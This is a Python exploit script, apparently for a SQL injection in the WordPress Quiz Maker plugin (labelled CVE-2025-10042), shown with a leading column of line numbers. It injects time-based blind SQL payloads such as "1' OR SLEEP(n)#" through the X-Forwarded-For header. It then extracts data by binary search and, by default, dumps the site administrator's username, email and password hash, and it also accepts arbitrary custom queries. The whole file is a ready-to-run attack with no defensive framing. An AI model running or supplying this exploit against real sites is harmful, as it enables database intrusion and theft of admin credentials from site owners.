1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135

from argparse import ArgumentParser
from requests import get
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from time import time
from sys import exit

disable_warnings(InsecureRequestWarning)

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$/:?"

def send_payload(url, path, header, payload, timeout):
    target = f"{url.rstrip('/')}/{path.lstrip('/')}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        header: payload
    }
    try:
        start = time()
        get(target, headers=headers, timeout=timeout, verify=False)
        return time() - start
    except:
        return timeout

def check_vulnerable(url, path, header, sleep_time, timeout):
    print("[*] Testing for SQL injection vulnerability...")
    
    baseline = send_payload(url, path, header, "127.0.0.1", timeout)
    print(f"[*] Baseline response time: {baseline:.2f}s")
    
    payload = f"1' OR SLEEP({sleep_time})#"
    injection = send_payload(url, path, header, payload, timeout)
    print(f"[*] Injection response time: {injection:.2f}s")
    
    if injection >= sleep_time * 0.7:
        print("[+] Target is VULNERABLE!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def extract_length(url, path, header, query, timeout):
    low, high = 1, 100
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(LENGTH(({query}))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return low

def extract_char(url, path, header, query, position, timeout):
    low, high = 32, 126
    
    while low < high:
        mid = (low + high) // 2
        payload = f"1' OR IF(ASCII(SUBSTRING(({query}),{position},1))>{mid},SLEEP(1),0)#"
        elapsed = send_payload(url, path, header, payload, timeout)
        
        if elapsed >= 0.8:
            low = mid + 1
        else:
            high = mid
    
    return chr(low) if low <= 126 else "?"

def extract_data(url, path, header, query, timeout):
    length = extract_length(url, path, header, query, timeout)
    print(f"[*] Data length: {length}")
    
    result = ""
    for i in range(1, length + 1):
        char = extract_char(url, path, header, query, i, timeout)
        result += char
        print(f"\r[*] Extracting: {result}", end="", flush=True)
    
    print()
    return result

def dump_users(url, path, header, timeout):
    print("\n[*] Extracting WordPress admin users...")
    
    # Get admin user login
    query = "SELECT user_login FROM wp_users WHERE ID=1"
    username = extract_data(url, path, header, query, timeout)
    print(f"[+] Username: {username}")
    
    # Get admin email
    query = "SELECT user_email FROM wp_users WHERE ID=1"
    email = extract_data(url, path, header, query, timeout)
    print(f"[+] Email: {email}")
    
    # Get password hash
    query = "SELECT user_pass FROM wp_users WHERE ID=1"
    password = extract_data(url, path, header, query, timeout)
    print(f"[+] Password Hash: {password}")
    
    return username, email, password

def main():
    parser = ArgumentParser(description="WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL")
    parser.add_argument("-p", "--path", required=True, help="Path to quiz page")
    parser.add_argument("-H", "--header", default="X-Forwarded-For", help="Header for injection")
    parser.add_argument("-t", "--timeout", type=int, default=10, help="Request timeout")
    parser.add_argument("--check", action="store_true", help="Only check vulnerability")
    parser.add_argument("--dump", action="store_true", help="Dump admin credentials")
    parser.add_argument("--query", help="Custom SQL query to extract")
    args = parser.parse_args()
    
    print("[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)")
    print(f"[+] Target: {args.url}")
    
    if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):
        exit(1)
    
    if args.check:
        exit(0)
    
    if args.dump:
        dump_users(args.url, args.path, args.header, args.timeout)
    elif args.query:
        print(f"\n[*] Executing custom query: {args.query}")
        result = extract_data(args.url, args.path, args.header, args.query, args.timeout)
        print(f"[+] Result: {result}")
    else:
        dump_users(args.url, args.path, args.header, args.timeout)

if __name__ == "__main__":
    main()